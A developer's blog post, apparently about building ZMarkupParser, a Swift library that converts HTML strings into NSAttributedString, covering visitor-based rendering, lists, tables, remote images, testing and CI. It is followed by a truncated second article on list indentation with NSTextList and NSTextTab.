Corresponding implementation in the original code HTMLElementWithMarkupToMarkupStyleProcessor.swift
The process result is shown in the above image
Now that we have the HTML Tag abstract tree structure and the MarkupStyle corresponding to the HTML Tag, the final step is to produce the final NSAttributedString rendering result.
visit markup to NSAttributedString
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+
struct MarkupNSAttributedStringVisitor: MarkupVisitor {
+ typealias Result = NSAttributedString
+
+ let components: [MarkupStyleComponent]
+ // root / base MarkupStyle, specified externally, for example, the size of the entire string
+ let rootStyle: MarkupStyle?
+
+ func visit(_ markup: RootMarkup) -> Result {
+ // Look down to the RawString object
+ return collectAttributedString(markup)
+ }
+
+ func visit(_ markup: RawStringMarkup) -> Result {
+ // Return Raw String
+ // Collect all MarkupStyles in the chain
+ // Apply Style to NSAttributedString
+ return applyMarkupStyle(markup.attributedString, with: collectMarkupStyle(markup))
+ }
+
+ func visit(_ markup: BoldMarkup) -> Result {
+ // Look down to the RawString object
+ return collectAttributedString(markup)
+ }
+
+ func visit(_ markup: LinkMarkup) -> Result {
+ // Look down to the RawString object
+ return collectAttributedString(markup)
+ }
+ // ...
+}
+
+private extension MarkupNSAttributedStringVisitor {
+ // Apply Style to NSAttributedString
+ func applyMarkupStyle(_ attributedString: NSAttributedString, with markupStyle: MarkupStyle?) -> NSAttributedString {
+ guard let markupStyle = markupStyle else { return attributedString }
+ let mutableAttributedString = NSMutableAttributedString(attributedString: attributedString)
+ mutableAttributedString.addAttributes(markupStyle.render(), range: NSMakeRange(0, mutableAttributedString.string.utf16.count))
+ return mutableAttributedString
+ }
+
+ func collectAttributedString(_ markup: Markup) -> NSMutableAttributedString {
+ // collect from downstream
+ // Root -> Bold -> String("Bold")
+ // \
+ // > String("Test")
+ // Result: Bold Test
+ // Recursively visit and combine the final NSAttributedString by looking down layer by layer for raw strings
+ return markup.childMarkups.compactMap({ visit(markup: $0) }).reduce(NSMutableAttributedString()) { partialResult, attributedString in
+ partialResult.append(attributedString)
+ return partialResult
+ }
+ }
+
+ func collectMarkupStyle(_ markup: Markup) -> MarkupStyle? {
+ // collect from upstream
+ // String("Test") -> Bold -> Italic -> Root
+ // Result: style: Bold+Italic
+ // Inherit styles layer by layer by looking up for parent tag's markupstyle
+ var currentMarkup: Markup? = markup.parentMarkup
+ var currentStyle = components.value(markup: markup)
+ while let thisMarkup = currentMarkup {
+ guard let thisMarkupStyle = components.value(markup: thisMarkup) else {
+ currentMarkup = thisMarkup.parentMarkup
+ continue
+ }
+
+ if var thisCurrentStyle = currentStyle {
+ thisCurrentStyle.fillIfNil(from: thisMarkupStyle)
+ currentStyle = thisCurrentStyle
+ } else {
+ currentStyle = thisMarkupStyle
+ }
+
+ currentMarkup = thisMarkup.parentMarkup
+ }
+
+ if var currentStyle = currentStyle {
+ currentStyle.fillIfNil(from: rootStyle)
+ return currentStyle
+ } else {
+ return rootStyle
+ }
+ }
+}
+
Corresponding implementation in the source code MarkupNSAttributedStringVisitor.swift
Operation process and result as shown in the figure
Finally, we can get:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
Li{
+ NSColor = "Blue";
+ NSFont = "<UICTFont: 0x145d17600> font-family: \".SFUI-Regular\"; font-weight: normal; font-style: normal; font-size: 13.00pt";
+ NSLink = "https://zhgchg.li";
+}nk{
+ NSColor = "Blue";
+ NSFont = "<UICTFont: 0x145d18710> font-family: \".SFUI-Semibold\"; font-weight: bold; font-style: normal; font-size: 13.00pt";
+ NSLink = "https://zhgchg.li";
+}Bold{
+ NSFont = "<UICTFont: 0x145d18710> font-family: \".SFUI-Semibold\"; font-weight: bold; font-style: normal; font-size: 13.00pt";
+}
+
🎉🎉🎉🎉Completed🎉🎉🎉🎉
At this point, we have completed the entire conversion process from HTML String to NSAttributedString.
Stripping HTML tags is relatively simple, just need to:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
func attributedString(_ markup: Markup) -> NSAttributedString {
+ if let rawStringMarkup = markup as? RawStringMarkup {
+ return rawStringMarkup.attributedString
+ } else {
+ return markup.childMarkups.compactMap({ attributedString($0) }).reduce(NSMutableAttributedString()) { partialResult, attributedString in
+ partialResult.append(attributedString)
+ return partialResult
+ }
+ }
+}
+
Corresponding implementation in the source code MarkupStripperProcessor.swift
Similar to Render, but purely returns the content after finding RawStringMarkup.
To extend and cover all HTMLTag/Style Attributes, a dynamic extension port is opened, making it convenient to dynamically extend objects directly from the code.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+
public struct ExtendTagName: HTMLTagName {
+ public let string: String
+
+ public init(_ w3cHTMLTagName: WC3HTMLTagName) {
+ self.string = w3cHTMLTagName.rawValue
+ }
+
+ public init(_ string: String) {
+ self.string = string.trimmingCharacters(in: .whitespacesAndNewlines).lowercased()
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagNameVisitor {
+ return visitor.visit(self)
+ }
+}
+// to
+final class ExtendMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
+//----
+
+public struct ExtendHTMLTagStyleAttribute: HTMLTagStyleAttribute {
+ public let styleName: String
+ public let render: ((String) -> (MarkupStyle?)) // Dynamically change MarkupStyle using closure
+
+ public init(styleName: String, render: @escaping ((String) -> (MarkupStyle?))) {
+ self.styleName = styleName
+ self.render = render
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagStyleAttributeVisitor {
+ return visitor.visit(self)
+ }
+}
+
Finally, we use the Builder Pattern to allow external Modules to quickly construct the objects required by ZMarkupParser and ensure Access Level Control.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+
public final class ZHTMLParserBuilder {
+
+ private(set) var htmlTags: [HTMLTag] = []
+ private(set) var styleAttributes: [HTMLTagStyleAttribute] = []
+ private(set) var rootStyle: MarkupStyle?
+ private(set) var policy: MarkupStylePolicy = .respectMarkupStyleFromCode
+
+ public init() {
+
+ }
+
+ public static func initWithDefault() -> Self {
+ var builder = Self.init()
+ for htmlTagName in ZHTMLParserBuilder.htmlTagNames {
+ builder = builder.add(htmlTagName)
+ }
+ for styleAttribute in ZHTMLParserBuilder.styleAttributes {
+ builder = builder.add(styleAttribute)
+ }
+ return builder
+ }
+
+ public func set(_ htmlTagName: HTMLTagName, withCustomStyle markupStyle: MarkupStyle?) -> Self {
+ return self.add(htmlTagName, withCustomStyle: markupStyle)
+ }
+
+ public func add(_ htmlTagName: HTMLTagName, withCustomStyle markupStyle: MarkupStyle? = nil) -> Self {
+ // Only one tagName can exist
+ htmlTags.removeAll { htmlTag in
+ return htmlTag.tagName.string == htmlTagName.string
+ }
+
+ htmlTags.append(HTMLTag(tagName: htmlTagName, customStyle: markupStyle))
+
+ return self
+ }
+
+ public func add(_ styleAttribute: HTMLTagStyleAttribute) -> Self {
+ styleAttributes.removeAll { thisStyleAttribute in
+ return thisStyleAttribute.styleName == styleAttribute.styleName
+ }
+
+ styleAttributes.append(styleAttribute)
+
+ return self
+ }
+
+ public func set(rootStyle: MarkupStyle) -> Self {
+ self.rootStyle = rootStyle
+ return self
+ }
+
+ public func set(policy: MarkupStylePolicy) -> Self {
+ self.policy = policy
+ return self
+ }
+
+ public func build() -> ZHTMLParser {
+ // ZHTMLParser init is only open for internal use, external cannot directly init
+ // Can only be initialized through ZHTMLParserBuilder
+ return ZHTMLParser(htmlTags: htmlTags, styleAttributes: styleAttributes, policy: policy, rootStyle: rootStyle)
+ }
+}
+
Corresponding implementation in ZHTMLParserBuilder.swift
initWithDefault will add all implemented HTMLTagName/Style Attribute by default
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+
public extension ZHTMLParserBuilder {
+ static var htmlTagNames: [HTMLTagName] {
+ return [
+ A_HTMLTagName(),
+ B_HTMLTagName(),
+ BR_HTMLTagName(),
+ DIV_HTMLTagName(),
+ HR_HTMLTagName(),
+ I_HTMLTagName(),
+ LI_HTMLTagName(),
+ OL_HTMLTagName(),
+ P_HTMLTagName(),
+ SPAN_HTMLTagName(),
+ STRONG_HTMLTagName(),
+ U_HTMLTagName(),
+ UL_HTMLTagName(),
+ DEL_HTMLTagName(),
+ TR_HTMLTagName(),
+ TD_HTMLTagName(),
+ TH_HTMLTagName(),
+ TABLE_HTMLTagName(),
+ IMG_HTMLTagName(handler: nil),
+ // ...
+ ]
+ }
+}
+
+public extension ZHTMLParserBuilder {
+ static var styleAttributes: [HTMLTagStyleAttribute] {
+ return [
+ ColorHTMLTagStyleAttribute(),
+ BackgroundColorHTMLTagStyleAttribute(),
+ FontSizeHTMLTagStyleAttribute(),
+ FontWeightHTMLTagStyleAttribute(),
+ LineHeightHTMLTagStyleAttribute(),
+ WordSpacingHTMLTagStyleAttribute(),
+ // ...
+ ]
+ }
+}
+
ZHTMLParser init is only open internally, external cannot directly init, can only init through ZHTMLParserBuilder.
ZHTMLParser encapsulates Render/Selector/Stripper operations:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+
public final class ZHTMLParser: ZMarkupParser {
+ let htmlTags: [HTMLTag]
+ let styleAttributes: [HTMLTagStyleAttribute]
+ let rootStyle: MarkupStyle?
+
+ internal init(...) {
+ }
+
+ // Get link style attributes
+ public var linkTextAttributes: [NSAttributedString.Key: Any] {
+ // ...
+ }
+
+ public func selector(_ string: String) -> HTMLSelector {
+ // ...
+ }
+
+ public func selector(_ attributedString: NSAttributedString) -> HTMLSelector {
+ // ...
+ }
+
+ public func render(_ string: String) -> NSAttributedString {
+ // ...
+ }
+
+ // Allow rendering of NSAttributedString within nodes using HTMLSelector results
+ public func render(_ selector: HTMLSelector) -> NSAttributedString {
+ // ...
+ }
+
+ public func render(_ attributedString: NSAttributedString) -> NSAttributedString {
+ // ...
+ }
+
+ public func stripper(_ string: String) -> String {
+ // ...
+ }
+
+ public func stripper(_ attributedString: NSAttributedString) -> NSAttributedString {
+ // ...
+ }
+
+ // ...
+}
+
Corresponding implementation in the original code ZHTMLParser.swift
The result of NSAttributedString is most commonly displayed in a UITextView, but note:
linkTextAttributes
setting, not by the NSAttributedString.Key setting, and individual styles cannot be set; hence the ZMarkupParser.linkTextAttributes
opening.1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
public extension UITextView {
+ func setHtmlString(_ string: String, with parser: ZHTMLParser) {
+ self.setHtmlString(NSAttributedString(string: string), with: parser)
+ }
+
+ func setHtmlString(_ string: NSAttributedString, with parser: ZHTMLParser) {
+ self.attributedText = parser.render(string)
+ self.linkTextAttributes = parser.linkTextAttributes
+ }
+}
+public extension UILabel {
+ func setHtmlString(_ string: String, with parser: ZHTMLParser) {
+ self.setHtmlString(NSAttributedString(string: string), with: parser)
+ }
+
+ func setHtmlString(_ string: NSAttributedString, with parser: ZHTMLParser) {
+ let attributedString = parser.render(string)
+ attributedString.enumerateAttribute(NSAttributedString.Key.attachment, in: NSMakeRange(0, attributedString.string.utf16.count), options: []) { (value, effectiveRange, nil) in
+ guard let attachment = value as? ZNSTextAttachment else {
+ return
+ }
+
+ attachment.register(self)
+ }
+
+ self.attributedText = attributedString
+ }
+}
+
Therefore, by extending UIKit, external users only need to use setHTMLString()
to complete the binding.
Record of implementing list items.
Using <ol>
/ <ul>
to wrap <li>
in HTML to represent list items:
1
+2
+3
+4
+5
+6
+
<ul>
+ <li>ItemA</li>
+ <li>ItemB</li>
+ <li>ItemC</li>
+ //...
+</ul>
+
Using the same parsing method as before, we can get other list items in visit(_ markup: ListItemMarkup)
to know the current list index (thanks to converting to AST).
1
+2
+3
+4
+
func visit(_ markup: ListItemMarkup) -> Result {
+ let siblingListItems = markup.parentMarkup?.childMarkups.filter({ $0 is ListItemMarkup }) ?? []
+ let position = (siblingListItems.firstIndex(where: { $0 === markup }) ?? 0)
+}
+
NSParagraphStyle has an NSTextList object that can be used to display list items, but in practice, it cannot customize the width of the whitespace (personally, I think the whitespace is too large). If there is whitespace between the bullet and the string, it will trigger a line break here, making the display look a bit odd, as shown in the image below:
The Better part can potentially be achieved by setting headIndent, firstLineHeadIndent, NSTextTab, but testing shows that if the string is too long or the size changes, it still cannot perfectly present the result.
Currently, it is only Acceptable, combining the list item string and inserting it before the string.
We only use NSTextList.MarkerFormat to generate list item symbols, rather than directly using NSTextList.
For a list of supported list symbols, refer to: MarkupStyleList.swift
Final display result: <ol><li>
Similar to the implementation of list items, but for tables.
Using <table>
in HTML to create a table -> wrapping <tr>
table rows -> wrapping <td>/<th>
to represent table cells:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+
<table>
+ <tr>
+ <th>Company</th>
+ <th>Contact</th>
+ <th>Country</th>
+ </tr>
+ <tr>
+ <td>Alfreds Futterkiste</td>
+ <td>Maria Anders</td>
+ <td>Germany</td>
+ </tr>
+ <tr>
+ <td>Centro comercial Moctezuma</td>
+ <td>Francisco Chang</td>
+ <td>Mexico</td>
+ </tr>
+</table>
+
Testing shows that the native NSAttributedString.DocumentType.html
uses the Private macOS API NSTextBlock
to complete the display, thus it can fully display the HTML table style and content.
A bit of cheating! We can’t use Private API 🥲
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+
func visit(_ markup: TableColumnMarkup) -> Result {
+ let attributedString = collectAttributedString(markup)
+ let siblingColumns = markup.parentMarkup?.childMarkups.filter({ $0 is TableColumnMarkup }) ?? []
+ let position = (siblingColumns.firstIndex(where: { $0 === markup }) ?? 0)
+
+ // Whether to specify the desired width externally, can set .max to not truncate string
+ var maxLength: Int? = markup.fixedMaxLength
+ if maxLength == nil {
+ // If not specified, find the string length of the same column in the first row as the max length
+ if let tableRowMarkup = markup.parentMarkup as? TableRowMarkup,
+ let firstTableRow = tableRowMarkup.parentMarkup?.childMarkups.first(where: { $0 is TableRowMarkup }) as? TableRowMarkup {
+ let firstTableRowColumns = firstTableRow.childMarkups.filter({ $0 is TableColumnMarkup })
+ if firstTableRowColumns.indices.contains(position) {
+ let firstTableRowColumnAttributedString = collectAttributedString(firstTableRowColumns[position])
+ let length = firstTableRowColumnAttributedString.string.utf16.count
+ maxLength = length
+ }
+ }
+ }
+
+ if let maxLength = maxLength {
+ // If the field exceeds maxLength, truncate the string
+ if attributedString.string.utf16.count > maxLength {
+ attributedString.mutableString.setString(String(attributedString.string.prefix(maxLength))+"...")
+ } else {
+ attributedString.mutableString.setString(attributedString.string.padding(toLength: maxLength, withPad: " ", startingAt: 0))
+ }
+ }
+
+ if position < siblingColumns.count - 1 {
+ // Add spaces as spacing, the width of the spacing can be specified externally
+ attributedString.append(makeString(in: markup, string: String(repeating: " ", count: markup.spacing)))
+ }
+
+ return attributedString
+ }
+
+ func visit(_ markup: TableRowMarkup) -> Result {
+ let attributedString = collectAttributedString(markup)
+ attributedString.append(makeBreakLine(in: markup)) // Add line break, for details refer to Source Code
+ return attributedString
+ }
+
+ func visit(_ markup: TableMarkup) -> Result {
+ let attributedString = collectAttributedString(markup)
+ attributedString.append(makeBreakLine(in: markup)) // Add line break, for details refer to Source Code
+ attributedString.insert(makeBreakLine(in: markup), at: 0) // Add line break, for details refer to Source Code
+ return attributedString
+ }
+
The final presentation effect is as follows:
not perfect, but acceptable.
Finally, let’s talk about the biggest challenge, loading remote images into NSAttributedString.
Use <img>
to represent images in HTML:
1
+
<img src="https://user-images.githubusercontent.com/33706588/219608966-20e0c017-d05c-433a-9a52-091bc0cfd403.jpg" width="300" height="125"/>
+
You can specify the desired display size through the width
/ height
HTML attributes.
Displaying images in NSAttributedString is much more complicated than imagined; and there is no good implementation. Previously, when doing UITextView text wrapping, I encountered some pitfalls, but after researching again, I found that there is still no perfect solution.
For now, let’s ignore the issue that NSTextAttachment natively cannot reuse and release memory. We will first implement downloading images from remote and placing them into NSTextAttachment, then into NSAttributedString, and achieve automatic content updates.
This series of operations is split into another small project for better optimization and reuse in other projects in the future:
Mainly referring to Asynchronous NSTextAttachments series of articles for implementation, but replacing the final content update part (refreshing the UI after downloading) and adding Delegate/DataSource for external extension use.
Operation flow and relationship as shown in the figure above:
func replace(attachment: ZNSTextAttachment, to: ZResizableNSTextAttachment)
)ZNSTextAttachment
to package imageURL, PlaceholderImage, and the size information to be displayed, then directly display the image with placeHolderimage(forBounds…
method, at which point we start downloading the Image DataZResizableNSTextAttachment
and implement the custom image size logic in attachmentBounds(for…
replace(attachment: ZNSTextAttachment, to: ZResizableNSTextAttachment)
method to replace the ZNSTextAttachment
position with ZResizableNSTextAttachment
For detailed code, refer to Source Code.
The reason for not using NSLayoutManager.invalidateLayout(forCharacterRange: range, actualCharacterRange: nil)
or NSLayoutManager.invalidateDisplay(forCharacterRange: range)
to refresh the UI is that the UI did not correctly display the update; since the Range is known, directly triggering the replacement of NSAttributedString ensures the UI is correctly updated.
The final display result is as follows:
1
+2
+
<span style="color:red">こんにちは</span>こんにちはこんにちは <br />
+<img src="https://user-images.githubusercontent.com/33706588/219608966-20e0c017-d05c-433a-9a52-091bc0cfd403.jpg"/>
+
In this project, in addition to writing Unit Tests, Snapshot Tests were also established for integration testing to facilitate comprehensive testing and comparison of the final NSAttributedString.
The main functional logic has UnitTests and integration tests. The final Test Coverage is around 85%.
Directly use the framework:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
import SnapshotTesting
+// ...
+func testShouldKeppNSAttributedString() {
+ let parser = ZHTMLParserBuilder.initWithDefault().build()
+ let textView = UITextView()
+ textView.frame.size.width = 390
+ textView.isScrollEnabled = false
+ textView.backgroundColor = .white
+ textView.setHtmlString("html string...", with: parser)
+ textView.layoutIfNeeded()
+ assertSnapshot(matching: textView, as: .image, record: false)
+}
+// ...
+
Directly compare the final result to see if it meets expectations, ensuring that the integration adjustments are not abnormal.
Integrate Codecov.io (free for Public Repo) to evaluate Test Coverage. Just install the Codecov Github App & configure it.
After setting up Codecov <-> Github Repo, you can also add codecov.yml
to the root directory of the project
1
+2
+3
+4
+5
+6
+
comment: # this is a top-level key
+ layout: "reach, diff, flags, files"
+ behavior: default
+ require_changes: false # if true: only post the comment if coverage changes
+ require_base: no # [yes :: must have a base report to post]
+ require_head: yes # [yes :: must have a head report to post]
+
Configuration file, this can enable the CI results to be automatically commented on the content after each PR is issued.
Github Action, CI integration: ci.yml
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+
name: CI
+
+on:
+ workflow_dispatch:
+ pull_request:
+ types: [opened, reopened]
+ push:
+ branches:
+ - main
+
+jobs:
+ build:
+ runs-on: self-hosted
+ steps:
+ - uses: actions/checkout@v3
+ - name: spm build and test
+ run: |
+ set -o pipefail
+ xcodebuild test -workspace ZMarkupParser.xcworkspace -testPlan ZMarkupParser -scheme ZMarkupParser -enableCodeCoverage YES -resultBundlePath './scripts/TestResult.xcresult' -destination 'platform=iOS Simulator,name=iPhone 14,OS=16.1' build test | xcpretty
+ - name: Codecov
+ uses: codecov/codecov-action@v3.1.1
+ with:
+ xcode: true
+ xcode_archive_path: './scripts/TestResult.xcresult'
+
This configuration runs build and test when PR is opened/reopened or push to the main branch, and finally uploads the test coverage report to codecov.
Regarding regular expressions, each use improves it further; this time, not much was used, but because I originally wanted to use a regex to extract paired HTML Tags, I also studied how to write it.
Some new cheat sheet notes learned this time…
?:
allows ( ) to match group results but not capture them e.g. (?:https?:\/\/)?(?:www\.)?example\.com
will return the entire URL in https://www.example.com
instead of https://
, www
.+?
non-greedy match (returns the nearest) e.g. <.+?>
will return <a>
, </a>
in <a>test</a>
instead of the entire string(?=XYZ)
any string until the XYZ
string appears; note that another similar one [^XYZ]
means any string until X or Y or Z
character appears e.g. (?:__)(.+?(?=__))(?:__)
(any string until __
) will match test
?R
recursively finds values with the same rule e.g. \((?:[^()]|((?R)))+\)
will match (simple)
, (and(nested))
, (nested)
in (simple) (and(nested))
?<GroupName>
… \k<GroupName>
matches the previous Group Name e.g. (?<tagName><a>).*(\k<GroupName>)
(?(X)yes|no)
matches the condition yes
if the X
match result has a value (can also use Group Name), otherwise matches no
Swift does not support this yetOther good articles on Regex:
This is also my first time developing with SPM & Cocoapods… It’s quite interesting, SPM is really convenient; but if you encounter a situation where two projects depend on the same package, opening both projects at the same time will result in one of them not finding the package and failing to build…
Cocoapods has uploaded ZMarkupParser but hasn’t tested if it’s working properly, because I’m using SPM 😝.
From the actual development experience, I found it most useful only when assisting in editing the Readme; in development, I haven’t felt any significant impact yet. When asking mid-senior level questions, it couldn’t provide a definite answer or even gave incorrect answers (I encountered some incorrect regex rules). So, in the end, I still turned to Google for the correct answers.
Not to mention asking it to write code, unless it’s simple Code Gen Object; otherwise, don’t expect it to complete the entire tool architecture directly. (At least for now, it seems that Copilot might be more helpful for writing code)
However, it can provide a general direction for knowledge blind spots, allowing us to quickly get a rough idea of how certain things should be done. Sometimes, when the understanding is too low, it’s hard to quickly pinpoint the correct direction on Google, and that’s when ChatGPT is quite helpful.
After more than three months of research and development, I am exhausted, but I still need to declare that this approach is only a feasible result obtained after my research. It is not necessarily the best solution, and there may still be areas for optimization. This project is more like a starting point, hoping to get a perfect solution for Markup Language to NSAttributedString. Everyone is very welcome to contribute; many things still need the power of the community to be perfected.
Here are some areas that I think can be improved as of now (2023/03/12), and will be recorded in the Repo later:
NSAttributedString.DocumentType.html
; there is still much room for optimization. I believe the performance is definitely not as good as XMLParser; I hope one day it can have the same performance while maintaining customization and automatic error correction.!important
functionality, enhancing the inheritance strategy of abstract MarkupStyleHere are all the technical details and the journey of developing ZMarkupParser. It took me almost three months of after-work and weekend time, countless research and practice, writing tests, improving Test Coverage, and setting up CI; finally, there is a somewhat decent result. I hope this tool solves the same problems for others and that everyone can help make this tool even better.
It is currently applied in our company’s pinkoi.com iOS App version, and no issues have been found. 😄
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Implementing list indentation similar to HTML List OL/UL/LI using NSTextList or NSTextTab with NSAttributedString in iOS Swift
Previously, while developing my open-source project “ZMarkupParser,” a library for converting HTML strings into NSAttributedString objects, I needed to research and implement the use of NSAttributedString to handle various HTML components. During this process, I came across the .paragraphStyle: NSParagraphStyle
attribute of NSAttributedString Attributes
, specifically the textLists: [NSTextList]
and tabStops: [NSTextTab]
properties. These are two very obscure attributes with limited online resources.
When initially implementing HTML list indentation conversion, I found examples showing that these two attributes could be used to achieve this. Let’s first take a look at the nested tag structure of HTML list indentation:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
<ul>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>
+ ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.
+ <ol>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ </ol>
+ </li>
+</ul>
+
Display effect in the browser:
As shown in the above image, the list supports multiple layers of nested structures and needs to be indented according to the level.
At that time, there were many other HTML tag conversion tasks that needed to be implemented, which was a lot of work. I quickly attempted to use NSTextList or NSTextTab to create the list indentation without delving deep into understanding. However, the results were not as expected - the spacing was too large, there was no alignment, multiple lines were misaligned, the nested structure was not clear, and spacing could not be controlled. After playing around with it for a while without finding a solution, I abandoned it and temporarily used a makeshift layout:
The above image effect is very poor because it was actually manually formatted using spaces and the symbol -
, without any indentation effect. The only advantage is that the spacing is composed of blank symbols, and the size can be controlled manually.
This matter was left unresolved, and I didn’t particularly work on it even after being open-sourced for over a year. It wasn’t until recently that I started receiving Issues requesting improvements to list conversion, and a developer provided a solution PR. By referencing the usage of NSParagraphStyle
in that PR, I was inspired once again. Researching NSTextList or NSTextTab could potentially allow for the perfect implementation of indented list functionality!
As usual, let’s start with the final result image.
v1.9.4
and above versions, HTML List Items can be perfectly converted into NSAttributedString objects.The main text begins below.
It’s “or” not “and” in the relationship between NSTextList
and NSTextTab
, meaning that these two attributes are not used together. Each of them can achieve list indentation independently.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+
let listLevel1ParagraphStyle = NSMutableParagraphStyle()
+listLevel1ParagraphStyle.textLists = [textListLevel1]
+
+let listLevel2ParagraphStyle = NSMutableParagraphStyle()
+listLevel2ParagraphStyle.textLists = [textListLevel1, textListLevel2]
+
+let attributedString = NSMutableAttributedString()
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 1))\tList Level 1 - 1 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 2))\tList Level 1 - 2\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 3))\tList Level 1 - 3\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 1))\tList Level 2 - 1\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 2))\tList Level 2 - 2 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 4))\tList Level 1 - 4\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+
+textView.attributedText = attributedString
+
Display Effect:
The Public API provided by NSTextList
is very limited, and the parameters that can be controlled are as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
// Item display style
+var markerFormat: NSTextList.MarkerFormat { get }
+
+// Starting number for ordered items
+var startingItemNumber: Int
+
+// Whether it is an ordered numeric item (available in iOS >= 16, surprisingly this API has been updated)
+@available(iOS 16.0, *)
+open var isOrdered: Bool { get }
+
+// Returns the item symbol string, with itemNumber as the item number. It can be omitted if it is a non-ordered numeric item
+open func marker(forItemNumber itemNumber: Int) -> String
+
NSTextList.MarkerFormat Styles:
Usage:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+
// Define a NSMutableParagraphStyle
+let listLevel1ParagraphStyle = NSMutableParagraphStyle()
+// Define List Item style, starting position of items
+let textListLevel1 = NSTextList(markerFormat: .decimal, startingItemNumber: 1)
+// Assign NSTextList to the textLists array
+listLevel1ParagraphStyle.textLists = [textListLevel1]
+//
+NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 1))\Item One\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle])
+
+// Adding nested sub-items:
+// Define sub-item List Item style, starting position of items
+let textListLevel2 = NSTextList(markerFormat: .circle, startingItemNumber: 1)
+// Define sub-item NSMutableParagraphStyle
+let listLevel2ParagraphStyle = NSMutableParagraphStyle()
+// Assign parent and child NSTextList to the textLists array
+listLevel1ParagraphStyle.textLists = [textListLevel1, textListLevel2]
+
+NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 1))\Item 1.1\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle])
+
+// Sub-items of nested sub-items...
+Continue appending NSTextList to the textLists array as needed
+
\n
to differentiate each list item.\tItem symbol\t
to allow access to the list result when accessing the attributedString.string as plain text.\tItem symbol\t
will not be displayed, so any processing done after the item symbol will not be visible (e.g., adding .
after the item number will not affect the display).Issues with usage:
.
to numeric items -> 1.
..circle
), and the child items are ordered numeric items (e.g., .decimal
), the startingItemNumber
